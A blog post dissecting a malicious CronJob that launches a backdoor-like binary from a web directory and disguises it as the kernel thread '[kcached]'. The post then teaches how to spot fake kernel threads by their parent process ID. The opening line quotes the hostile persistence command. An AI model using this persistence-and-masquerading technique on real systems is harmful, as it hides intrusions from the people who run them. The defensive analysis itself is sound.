/usr/bin/pkill -0 -U1004 gs-dbus 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/admin/www/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/admin/www/gs-dbus'" 2>/dev/null

What these commands do is explained fairly simply: pkill checks (via the -0 parameter) whether a process named gs-dbus is already running under user ID 1004. If such a process is found, pkill exits with 0 and everything after the || (logical OR) is not executed.

The right part of the OR is only executed when pkill exits with 1, i.e. when no process named gs-dbus is found. In that case a few environment variables are set, the /home/admin/www/gs-dbus binary is started, and its process is renamed to [kcached].
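The pkill -0 idiom can be tried safely on any system: signal 0 delivers nothing to the process, so only the exit status reveals whether a matching process exists. A small demonstration with a harmless stand-in process:

```shell
#!/bin/sh
# Start a harmless long-running dummy process.
sleep 300 &
DUMMY=$!

# Signal 0 performs no action; pkill merely reports via its exit code
# whether a process with exactly this name (-x) exists.
if pkill -0 -x sleep; then
    echo "sleep is running"
else
    echo "sleep is not running"
fi

# Clean up the dummy process.
kill "$DUMMY"
```

The same pattern works with the -U flag from the CronJob to restrict the match to a specific user ID.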

And while this explains what is logically happening, it still doesn't explain what this CronJob actually does.

Now another person explained that it is the gs-dbus service from Gnome being started if it isn't already running, and claimed it was probably safe. Why this person came to that conclusion is beyond me. Probably because https://gitlab.gnome.org/GNOME/gnome-software/-/blob/main/src/gs-dbus-helper.c shows up as a result if you just search for gs-dbus. But again, this person overlooked some critical pieces of information.

And this made me take the time to write this little blogpost about how to approach such situations.

There are some crucial pieces of evidence which immediately tell me that this is not a legitimate piece of software:

  1. Base64-encoded strings which get executed via bash almost never do anything good
  2. If that software really belonged to Gnome, there would be Systemd unit files or timers. Or, on a system without Systemd, good old init scripts. But even then there would, most likely, be some kind of Gnome sub-process started by Gnome itself, not some obfuscated CronJob
  3. Renaming the process to [kcached] makes it look like a kernel-level thread. If there is an equivalent to "world's biggest warning sign", this is it.
  4. The binary being started is /home/admin/www/gs-dbus. Notice www as the folder where the binary is stored? Yeah, that is usually an indicator that files in this folder are reachable via a webserver. Hence I assume that /home/admin/www/ hosts some vulnerable web application which served as the entry point for the malicious software & CronJob.

What the person missed is: processes in square brackets are always kernel-level threads, running as root and having a parent process ID (PPID) of 2. This means someone is renaming a process started by a non-root user to make it look like a kernel-level thread, obviously to deceive the users and security mechanisms of that system. There is no legitimate reason to do so.

Would you investigate further, or even kill that process, when some scanning software reports a kernel-level thread? Well, the obvious answer is: of course, YES! But far too many inexperienced users won't.

All processes with [] around them are started by kthreadd - the Kernel Thread Daemon. kthreadd itself is started by the kernel during boot.

Therefore we have 3 truths about kernel level threads:

  1. They will always have the process ID 2 as their parent process ID (PPID)
  2. They will always run as root, never as a user
  3. They will always be started by [kthreadd] itself

Let's take a look at the following ps output from one of my Debian systems. I'll make it quick & dirty and simply grep for all processes with a [ in them.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
      3       2 root     rcu_gp          [rcu_gp]
      4       2 root     rcu_par_gp      [rcu_par_gp]
      5       2 root     slub_flushwq    [slub_flushwq]
      6       2 root     netns           [netns]
      8       2 root     kworker/0:0H-ev [kworker/0:0H-events_highpri]
     10       2 root     mm_percpu_wq    [mm_percpu_wq]
     11       2 root     rcu_tasks_kthre [rcu_tasks_kthread]
     12       2 root     rcu_tasks_rude_ [rcu_tasks_rude_kthread]
     13       2 root     rcu_tasks_trace [rcu_tasks_trace_kthread]
     14       2 root     ksoftirqd/0     [ksoftirqd/0]
     15       2 root     rcu_preempt     [rcu_preempt]
     16       2 root     migration/0     [migration/0]
     18       2 root     cpuhp/0         [cpuhp/0]
     19       2 root     cpuhp/1         [cpuhp/1]
     20       2 root     migration/1     [migration/1]
     21       2 root     ksoftirqd/1     [ksoftirqd/1]
     23       2 root     kworker/1:0H-ev [kworker/1:0H-events_highpri]
     24       2 root     cpuhp/2         [cpuhp/2]
     25       2 root     migration/2     [migration/2]
     26       2 root     ksoftirqd/2     [ksoftirqd/2]
     28       2 root     kworker/2:0H-ev [kworker/2:0H-events_highpri]
     29       2 root     cpuhp/3         [cpuhp/3]
     30       2 root     migration/3     [migration/3]
     31       2 root     ksoftirqd/3     [ksoftirqd/3]
     33       2 root     kworker/3:0H-ev [kworker/3:0H-events_highpri]
     38       2 root     kdevtmpfs       [kdevtmpfs]
     39       2 root     inet_frag_wq    [inet_frag_wq]
     40       2 root     kauditd         [kauditd]
     41       2 root     khungtaskd      [khungtaskd]
     42       2 root     oom_reaper      [oom_reaper]
     43       2 root     writeback       [writeback]
     44       2 root     kcompactd0      [kcompactd0]
     45       2 root     ksmd            [ksmd]
     46       2 root     khugepaged      [khugepaged]
     47       2 root     kintegrityd     [kintegrityd]
     48       2 root     kblockd         [kblockd]
     49       2 root     blkcg_punt_bio  [blkcg_punt_bio]
     50       2 root     tpm_dev_wq      [tpm_dev_wq]
     51       2 root     edac-poller     [edac-poller]
     52       2 root     devfreq_wq      [devfreq_wq]
     54       2 root     kworker/0:1H-kb [kworker/0:1H-kblockd]
     55       2 root     kswapd0         [kswapd0]
     62       2 root     kthrotld        [kthrotld]
     64       2 root     acpi_thermal_pm [acpi_thermal_pm]
     66       2 root     mld             [mld]
     67       2 root     ipv6_addrconf   [ipv6_addrconf]
     72       2 root     kstrp           [kstrp]
     78       2 root     zswap-shrink    [zswap-shrink]
     79       2 root     kworker/u9:0    [kworker/u9:0]
    123       2 root     kworker/1:1H-kb [kworker/1:1H-kblockd]
    133       2 root     kworker/2:1H-kb [kworker/2:1H-kblockd]
    152       2 root     kworker/3:1H-kb [kworker/3:1H-kblockd]
    154       2 root     ata_sff         [ata_sff]
    155       2 root     scsi_eh_0       [scsi_eh_0]
    156       2 root     scsi_tmf_0      [scsi_tmf_0]
    157       2 root     scsi_eh_1       [scsi_eh_1]
    158       2 root     scsi_tmf_1      [scsi_tmf_1]
    159       2 root     scsi_eh_2       [scsi_eh_2]
    160       2 root     scsi_tmf_2      [scsi_tmf_2]
    173       2 root     kdmflush/254:0  [kdmflush/254:0]
    175       2 root     kdmflush/254:1  [kdmflush/254:1]
    209       2 root     jbd2/dm-0-8     [jbd2/dm-0-8]
    210       2 root     ext4-rsv-conver [ext4-rsv-conver]
    341       2 root     cryptd          [cryptd]
    426       2 root     ext4-rsv-conver [ext4-rsv-conver]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 340800       2 root     kworker/0:0-cgw [kworker/0:0-cgwb_release]
 341004       2 root     kworker/1:1-eve [kworker/1:1-events]
 341535       2 root     kworker/1:2     [kworker/1:2]
 341837       2 root     kworker/2:0-mm_ [kworker/2:0-mm_percpu_wq]
 342029       2 root     kworker/2:1     [kworker/2:1]
 342136  141234 root     sshd            sshd: user [priv]
 342266       2 root     kworker/0:1-eve [kworker/0:1-events]
 342273       2 root     kworker/u8:0-fl [kworker/u8:0-flush-254:0]
 342274       2 root     kworker/3:0-ata [kworker/3:0-ata_sff]
 342278       2 root     kworker/u8:3-ev [kworker/u8:3-events_unbound]
 342279       2 root     kworker/3:1-ata [kworker/3:1-ata_sff]
 342307       2 root     kworker/u8:1-ev [kworker/u8:1-events_unbound]
 342308       2 root     kworker/3:2-eve [kworker/3:2-events]
 342310  342144 user     grep            grep --color=auto \[

Notice something?

There are only 4 processes not having a PPID of 2.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 342136  141234 root     sshd            sshd: user [priv]
 342310  342144 user     grep            grep --color=auto \[

One is [kthreadd], which actually owns PID 2 and was started by PPID 0; the second is my grep command; and the two others are from sshd. But only [kthreadd] is actually enclosed in square brackets, as it doesn't have a command line.

If I start a random process and rename it to [gs-dbus], similar to what the CronJob would do, it will show up in the following way:

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
324234  453452 admin     [gs-dbus] [gs-dbus]

PID 324234, PPID 453452, and running under the user admin: nothing here matches the behaviour of a kernel-level thread. And this should raise all the red flags your mind possesses.
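Based on those three truths, a quick hunting one-liner can flag such fakes: list every process whose command line starts with a bracketed name but whose PID/PPID is not 2. This is a sketch assuming the procps version of ps; column layout may differ slightly on other systems.

```shell
#!/bin/sh
# List processes that *look* like kernel threads (command line starts
# with "[") but violate the PPID-of-2 rule, i.e. were not started by
# kthreadd. On a clean system this should print nothing.
ps -eo pid,ppid,user,args --no-headers \
  | awk '$1 != 2 && $2 != 2 && $4 ~ /^\[/ {print "suspicious:", $0}'
```

Note that this matches on the args column, so the real kernel threads (all children of PID 2) and processes that merely contain brackets later in their command line, like the sshd listener above, are not flagged.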

And this is why the basics are so important. Do not just assume a piece of software is doing nothing bad because "there is some legitimate software out there on the Internet sharing the same name". Anyone can lie. And the bad guys most likely are.

Comments